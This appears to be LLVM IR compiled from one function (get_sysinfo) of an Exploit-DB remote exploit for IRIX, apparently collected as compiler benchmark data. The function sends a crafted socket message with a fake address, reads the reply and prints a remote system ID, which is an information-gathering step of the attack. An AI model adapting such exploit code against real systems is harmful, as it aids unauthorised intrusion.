; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/irix/remote/extr_19822.c_get_sysinfo.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/irix/remote/extr_19822.c_get_sysinfo.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_6__ = type { i32*, i32 }
%struct.TYPE_5__ = type { i32, i32, i64, i8*, %struct.TYPE_6__*, i8* }

@numer_one = common dso_local global i32* null, align 8
@iov = common dso_local global %struct.TYPE_6__* null, align 8
@numer_two = common dso_local global i32* null, align 8
@fake_adrs = common dso_local global i64 0, align 8
@msg = common dso_local global %struct.TYPE_5__ zeroinitializer, align 8
@.str = private unnamed_addr constant [25 x i8] c"SM:  --[0x%04x bytes]--\0A\00", align 1
@sck = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [2 x i8] c"\0A\00", align 1
@buf1 = common dso_local global i32* null, align 8
@buf2 = common dso_local global i32* null, align 8
@.str.2 = private unnamed_addr constant [25 x i8] c"RM:  --[0x%04x bytes]--\0A\00", align 1
@.str.3 = private unnamed_addr constant [7 x i8] c"\0A\01\01;\01x\00", align 1
@.str.4 = private unnamed_addr constant [19 x i8] c"remote system ID: \00", align 1
@.str.5 = private unnamed_addr constant [6 x i8] c"%02x \00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i8* @get_sysinfo() #0 {
  %1 = alloca i8*, align 8
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  store i32 0, i32* %2, align 4
  %5 = load i32*, i32** @numer_one, align 8
  %6 = load %struct.TYPE_6__*, %struct.TYPE_6__** @iov, align 8
  %7 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %6, i64 0
  %8 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %7, i32 0, i32 0
  store i32* %5, i32** %8, align 8
  %9 = load %struct.TYPE_6__*, %struct.TYPE_6__** @iov, align 8
  %10 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %9, i64 0
  %11 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %10, i32 0, i32 1
  store i32 16, i32* %11, align 8
  %12 = load i32*, i32** @numer_two, align 8
  %13 = load %struct.TYPE_6__*, %struct.TYPE_6__** @iov, align 8
  %14 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %13, i64 1
  %15 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %14, i32 0, i32 0
  store i32* %12, i32** %15, align 8
  %16 = load %struct.TYPE_6__*, %struct.TYPE_6__** @iov, align 8
  %17 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %16, i64 1
  %18 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %17, i32 0, i32 1
  store i32 36, i32* %18, align 8
  %19 = load i64, i64* @fake_adrs, align 8
  %20 = inttoptr i64 %19 to i8*
  store i8* %20, i8** getelementptr inbounds (%struct.TYPE_5__, %struct.TYPE_5__* @msg, i32 0, i32 5), align 8
  store i32 16, i32* getelementptr inbounds (%struct.TYPE_5__, %struct.TYPE_5__* @msg, i32 0, i32 0), align 8
  %21 = load %struct.TYPE_6__*, %struct.TYPE_6__** @iov, align 8
  store %struct.TYPE_6__* %21, %struct.TYPE_6__** getelementptr inbounds (%struct.TYPE_5__, %struct.TYPE_5__* @msg, i32 0, i32 4), align 8
  store i32 2, i32* getelementptr inbounds (%struct.TYPE_5__, %struct.TYPE_5__* @msg, i32 0, i32 1), align 4
  store i8* null, i8** getelementptr inbounds (%struct.TYPE_5__, %struct.TYPE_5__* @msg, i32 0, i32 3), align 8
  store i64 0, i64* getelementptr inbounds (%struct.TYPE_5__, %struct.TYPE_5__* @msg, i32 0, i32 2), align 8
  %22 = load i32, i32* @sck, align 4
  %23 = call i32 @sendmsg(i32 %22, %struct.TYPE_5__* @msg, i32 0)
  %24 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str, i64 0, i64 0), i32 %23)
  %25 = call i32 (...) @show_msg()
  %26 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.1, i64 0, i64 0))
  %27 = load i32*, i32** @buf1, align 8
  %28 = load %struct.TYPE_6__*, %struct.TYPE_6__** @iov, align 8
  %29 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %28, i64 0
  %30 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %29, i32 0, i32 0
  store i32* %27, i32** %30, align 8
  %31 = load i32*, i32** @buf2, align 8
  %32 = load %struct.TYPE_6__*, %struct.TYPE_6__** @iov, align 8
  %33 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %32, i64 1
  %34 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %33, i32 0, i32 0
  store i32* %31, i32** %34, align 8
  %35 = load %struct.TYPE_6__*, %struct.TYPE_6__** @iov, align 8
  %36 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %35, i64 1
  %37 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %36, i32 0, i32 1
  store i32 512, i32* %37, align 8
  store i32 2, i32* getelementptr inbounds (%struct.TYPE_5__, %struct.TYPE_5__* @msg, i32 0, i32 1), align 4
  %38 = load i32, i32* @sck, align 4
  %39 = call i32 @recvmsg(i32 %38, %struct.TYPE_5__* @msg, i32 0)
  store i32 %39, i32* %4, align 4
  %40 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.2, i64 0, i64 0), i32 %39)
  %41 = call i32 (...) @show_msg()
  %42 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.1, i64 0, i64 0))
  br label %43

43:                                               ; preds = %90, %0
  %44 = load i32, i32* %2, align 4
  %45 = load i32, i32* %4, align 4
  %46 = sub nsw i32 %45, 22
  %47 = icmp slt i32 %44, %46
  br i1 %47, label %48, label %91

48:                                               ; preds = %43
  %49 = load i32*, i32** @buf2, align 8
  %50 = load i32, i32* %2, align 4
  %51 = sext i32 %50 to i64
  %52 = getelementptr inbounds i32, i32* %49, i64 %51
  %53 = call i32 @memcmp(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.3, i64 0, i64 0), i32* %52, i32 6)
  %54 = icmp ne i32 %53, 0
  br i1 %54, label %87, label %55

55:                                               ; preds = %48
  %56 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.4, i64 0, i64 0))
  store i32 0, i32* %3, align 4
  br label %57

57:                                               ; preds = %76, %55
  %58 = load i32, i32* %3, align 4
  %59 = load i32*, i32** @buf2, align 8
  %60 = load i32, i32* %2, align 4
  %61 = add nsw i32 %60, 6
  %62 = sext i32 %61 to i64
  %63 = getelementptr inbounds i32, i32* %59, i64 %62
  %64 = load i32, i32* %63, align 4
  %65 = icmp slt i32 %58, %64
  br i1 %65, label %66, label %79

66:                                               ; preds = %57
  %67 = load i32*, i32** @buf2, align 8
  %68 = load i32, i32* %2, align 4
  %69 = add nsw i32 %68, 7
  %70 = load i32, i32* %3, align 4
  %71 = add nsw i32 %69, %70
  %72 = sext i32 %71 to i64
  %73 = getelementptr inbounds i32, i32* %67, i64 %72
  %74 = load i32, i32* %73, align 4
  %75 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.5, i64 0, i64 0), i32 %74)
  br label %76

76:                                               ; preds = %66
  %77 = load i32, i32* %3, align 4
  %78 = add nsw i32 %77, 1
  store i32 %78, i32* %3, align 4
  br label %57

79:                                               ; preds = %57
  %80 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.1, i64 0, i64 0))
  %81 = load i32*, i32** @buf2, align 8
  %82 = load i32, i32* %2, align 4
  %83 = add nsw i32 %82, 6
  %84 = sext i32 %83 to i64
  %85 = getelementptr inbounds i32, i32* %81, i64 %84
  %86 = bitcast i32* %85 to i8*
  store i8* %86, i8** %1, align 8
  br label %92

87:                                               ; preds = %48
  %88 = load i32, i32* %2, align 4
  %89 = add nsw i32 %88, 1
  store i32 %89, i32* %2, align 4
  br label %90

90:                                               ; preds = %87
  br label %43

91:                                               ; preds = %43
  store i8* null, i8** %1, align 8
  br label %92

92:                                               ; preds = %91, %79
  %93 = load i8*, i8** %1, align 8
  ret i8* %93
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @sendmsg(i32, %struct.TYPE_5__*, i32) #1

declare dso_local i32 @show_msg(...) #1

declare dso_local i32 @recvmsg(i32, %struct.TYPE_5__*, i32) #1

declare dso_local i32 @memcmp(i8*, i32*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
